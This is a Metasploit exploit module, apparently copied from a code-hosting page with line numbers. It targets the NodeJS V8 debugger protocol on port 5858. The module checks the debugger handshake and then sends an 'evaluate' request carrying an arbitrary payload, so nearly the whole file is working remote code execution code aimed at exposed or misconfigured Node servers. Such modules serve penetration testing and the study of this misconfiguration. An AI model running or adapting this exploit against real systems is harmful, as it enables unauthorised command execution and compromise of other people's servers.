Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  MESSAGE_HEADER_TEMPLATE   = "Content-Length: %{length}\r\n\r\n"
12

13
  def initialize(info={})
14
    super(update_info(info,
15
      'Name'           => "NodeJS Debugger Command Injection",
16
      'Description'    => %q{
17
        This module uses the "evaluate" request type of the NodeJS V8
18
        debugger protocol (version 1) to evaluate arbitrary JS and
19
         call out to other system commands. The port (default 5858) is
20
        not exposed non-locally in default configurations, but may be
21
        exposed either intentionally or via misconfiguration.
22
      },
23
      'License'        => MSF_LICENSE,
24
      'Author'         => [ 'Patrick Thomas <pst[at]coffeetocode.net>' ],
25
      'References'     =>
26
        [
27
          [ 'URL', 'https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md' ],
28
          [ 'URL', 'https://github.com/nodejs/node/pull/8106' ]
29
        ],
30
      'Targets'        =>
31
        [
32
          ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => 'nodejs' } ],
33
        ],
34
      'Privileged'     => false,
35
      'DisclosureDate' => '2016-08-15',
36
      'DefaultTarget'  => 0)
37
    )
38

39
    register_options(
40
      [
41
        Opt::RPORT(5858)
42
      ])
43
  end
44

45
  def make_eval_message
46
    msg_body = { seq: 1,
47
                 type: 'request',
48
                 command: 'evaluate',
49
                 arguments: { expression: payload.encoded,
50
                              global: true,
51
                              maxStringLength:-1
52
                            }
53
                }.to_json
54
    msg_header = MESSAGE_HEADER_TEMPLATE % {:length => msg_body.length}
55
    msg_header + msg_body
56
  end
57

58
  def check
59
    connect
60
    res = sock.get_once
61
    disconnect
62

63
    if res.include? "V8-Version" and res.include? "Protocol-Version: 1"
64
      vprint_status("Got debugger handshake:\n#{res}")
65
      return Exploit::CheckCode::Appears
66
    end
67

68
    Exploit::CheckCode::Unknown
69
  end
70

71
  def exploit
72
    connect
73
    # must consume incoming handshake before sending payload
74
    buf = sock.get_once
75
    msg = make_eval_message
76
    print_status("Sending #{msg.length} byte payload...")
77
    vprint_status("#{msg}")
78
    sock.put(msg)
79
    buf = sock.get_once
80

81
    if buf.include? '"command":"evaluate","success":true'
82
      print_status("Got success response")
83
    elsif buf.include? '"command":"evaluate","success":false'
84
      print_error("Got failure response: #{buf}")
85
    else
86
      print_error("Got unexpected response: #{buf}")
87
    end
88
  end
89

90
end
91

92